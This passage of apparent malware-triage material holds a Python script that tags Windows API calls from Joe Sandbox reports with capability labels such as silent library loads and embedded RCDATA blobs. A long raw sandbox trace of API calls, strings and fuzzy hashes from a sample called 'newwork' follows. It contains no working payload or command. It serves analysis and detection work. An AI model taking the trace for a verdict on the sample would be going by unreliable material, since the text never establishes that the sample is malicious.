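CAPABILITIES = {                 # assumed labels (my naming, not a Joe Sandbox taxonomy)
    "CreateProcess": "process-creation", "LoadLibrary": "dynamic-loading",
    "RegEnumKeyEx": "registry-enumeration", "MoveFile": "file-move",
    "CreateDirectory": "directory-creation", "FindResource": "resource-access",
}

@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str                       # call-site address
    subcall: Optional[str] = None  # callee address when the call happens inside a subroutine

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an integer; None for '?' or a missing argument."""
        try:
            return int(self.args[i], 16)
        except (IndexError, ValueError):
            return None

@dataclass
class FunctionRecord:
    calls: List[Call] = field(default_factory=list)
    api_id: str = ""

def canonical(api: str) -> str:
    """LoadLibraryA -> LoadLibrary, but leave all-caps endings (GetACP, GetDC) alone."""
    return api[:-1] if len(api) > 1 and api[-1] in "AW" and api[-2].islower() else api

def tag_record(rec: FunctionRecord) -> List[str]:
    names = [canonical(c.api) for c in rec.calls]
    tags = {CAPABILITIES[n] for n, c in zip(names, rec.calls)
            if c.subcall is None and n in CAPABILITIES}
    # SetErrorMode(SEM_NOOPENFILEERRORBOX) immediately before LoadLibrary: a failed load
    # stays silent (Delphi's SafeLoadLibrary does this; so do loaders probing for DLLs).
    for i in range(len(names) - 1):
        flags = rec.calls[i].arg_int(0)
        if names[i:i + 2] == ["SetErrorMode", "LoadLibrary"] and flags and flags & SEM_NOOPENFILEERRORBOX:
            tags.add("silent-library-load")
    # FindResource(hModule, name, RT_RCDATA): a data blob carried inside the PE itself.
    if any(n == "FindResource" and c.arg_int(2) == RT_RCDATA for n, c in zip(names, rec.calls)):
        tags.add("rcdata-resource")
    return sorted(tags)

def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":            # every record opens with this header
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := CALL_RE.match(raw)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
    return records

if __name__ == "__main__":   # quick triage table over the sample
    for r in parse_records(SAMPLE):
        direct = ", ".join(c.api for c in r.calls if c.subcall is None)
        print(f"{r.api_id:48s} {direct:40s} {' '.join(tag_record(r))}")
```

Indirect calls (those under "Part of subcall function") are kept in the record but excluded from capability tags, because they belong to a shared callee such as the allocator behind RtlEnterCriticalSection/LocalAlloc and would otherwise tag every caller alike. Tagging on argument values rather than API names alone is what distinguishes an ordinary LoadLibraryA from a deliberately silent one, or FindResourceA(…, 0000000A) reading an RCDATA blob from a plain icon lookup.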
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E39E
• LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
APIs
• SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
• CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
Strings
Similarity
• API ID: FolderFreeKnownPathTask
• String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
• API String ID: 969438705-544719455
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
  • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
Similarity
• API ID: InfoScroll
• String ID:
• API String ID: 629608716-0
APIs
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
  • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
  • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
Similarity
• API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
• String ID:
• API String ID: 3319771486-0
APIs
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
APIs
• GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
Similarity
• API ID: ExtentPointText
• String ID:
• API String ID: 566491939-0
APIs
• CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
APIs
• RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
• KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
  • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
• ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
  • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
APIs
• SetWindowTextA.USER32(?,00000000), ref: 004242DC
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
                                                                                        • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                        • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                        • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                        • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                        • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                        • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                        • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                        • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                        • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                        • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                        • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                        • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                        • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                        APIs
                                                                                        • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                          • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 734332943-0
                                                                                        • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                        • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                        • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                        • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                        APIs
                                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 1611563598-0
                                                                                        • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                        • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                        • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                        • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                        • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                        • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                        • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3375834691-0
                                                                                        • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                        • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                        • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                        • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                        • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                        • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                        • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                        • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                        • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                        • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1452528299-0
                                                                                        • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                        • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                        • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                        • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
• Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
• Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
• Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
APIs
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
• Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
• Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
• Instruction Fuzzy Hash:
APIs
• GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
• SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
• LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
• SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
• GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
• GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
• GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
• GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
• GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
• GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
• GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
• GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
• FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
Strings
Similarity
• API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
• String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
• API String ID: 2323315520-3614243559
• Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
• Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
• Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
• Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
APIs
• GetTickCount.KERNEL32 ref: 0045862F
• QueryPerformanceCounter.KERNEL32(021A3858,00000000,004588C2,?,?,021A3858,00000000,?,00458FBE,?,021A3858,00000000), ref: 00458638
• GetSystemTimeAsFileTime.KERNEL32(021A3858,021A3858), ref: 00458642
• GetCurrentProcessId.KERNEL32(?,021A3858,00000000,004588C2,?,?,021A3858,00000000,?,00458FBE,?,021A3858,00000000), ref: 0045864B
